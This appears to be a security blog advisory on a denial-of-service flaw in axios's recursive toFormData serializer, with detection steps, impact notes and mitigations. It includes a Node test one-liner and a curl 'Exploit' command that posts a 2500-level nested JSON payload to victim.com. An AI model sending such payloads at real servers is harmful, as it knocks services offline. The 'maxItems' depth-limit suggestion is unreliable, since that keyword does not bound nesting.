Listen to this Post
The vulnerability resides in `toFormData.js` (axios library) where an inner `build(value, path)` function recursively traverses user-supplied objects with no depth limit. When a client provides a deeply nested object (e.g., 2500 levels), each nesting level triggers a new `build()` call. The recursion continues until V8’s stack capacity is exhausted, throwing a RangeError: Maximum call stack size exceeded. No depth check, try/catch, or iterative fallback exists—only a circular reference detector. This recursive serializer is invoked when axios processes `data` (for `FormData` bodies) or `params` (via `AxiosURLSearchParams` and buildURL). Any server-side endpoint that forwards a client-supplied JSON object into `axios({ data, params })` becomes a DoS vector. The error propagates synchronously out of the request handler, crashing the individual request. In worker threads or startup code, it kills the entire Node.js process. Proof-of-concept confirms crash at depth 2500 on Node.js 20 with axios 1.15.0 (latest as of 2026-04-10). Unauthenticated remote attackers can repeatedly send crafted payloads to exhaust call stack, leading to service disruption.
Platform: axios Node.js
Version: 1.15.0
Vulnerability: Recursive stack overflow
Severity: Medium
date: 2026-04-10
Prediction: Patch within 30 days
What Undercode Say:
Check if your axios version is affected
npm list axios
Test for deep recursion vulnerability (Node.js)
node -e "const axios=require('axios'); const deep={leaf:1}; for(let i=0;i<2500;i++) deep={a:deep}; axios.post('http://localhost:3000/forward', deep).catch(e=>console.log(e.message));"
Monitor stack overflow logs in production
grep -i "Maximum call stack size exceeded" /var/log/app/node.log
Exploit:
Attacker sends POST request with JSON payload nested 2500+ levels deep to any endpoint that echoes or proxies user input via axios. Example using curl:
curl -X POST http://victim.com/proxy \
-H "Content-Type: application/json" \
-d "$(python3 -c "def nest(d): return {'a': nest(d-1)} if d else {'leaf':1}; import json; print(json.dumps(nest(2500)))")"
Server throws RangeError, request handler dies; repeated requests cause sustained DoS.
Protection from this CVE
- Upgrade axios when official patch is released (implementing depth limit ~100).
- Apply temporary workaround: validate/limit nesting depth of incoming JSON before passing to axios (e.g., using `json-schema` with `maxItems` or custom recursive depth check).
- Replace synchronous recursive `toFormData` with iterative stack-based serialization in local fork.
- Deploy reverse proxy with request size and nesting depth limits (e.g., Nginx `client_max_body_size` and custom Lua depth filter).
Impact
Remote unauthenticated attacker crashes server-side request handlers that forward client-controlled objects to axios (data or params). In clustered environments (e.g., Node.js `cluster` module), each crashing worker forces restarts leading to degraded performance or full outage. No data loss or privilege escalation, but high availability impact for any API gateway or microservice using axios as HTTP client.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
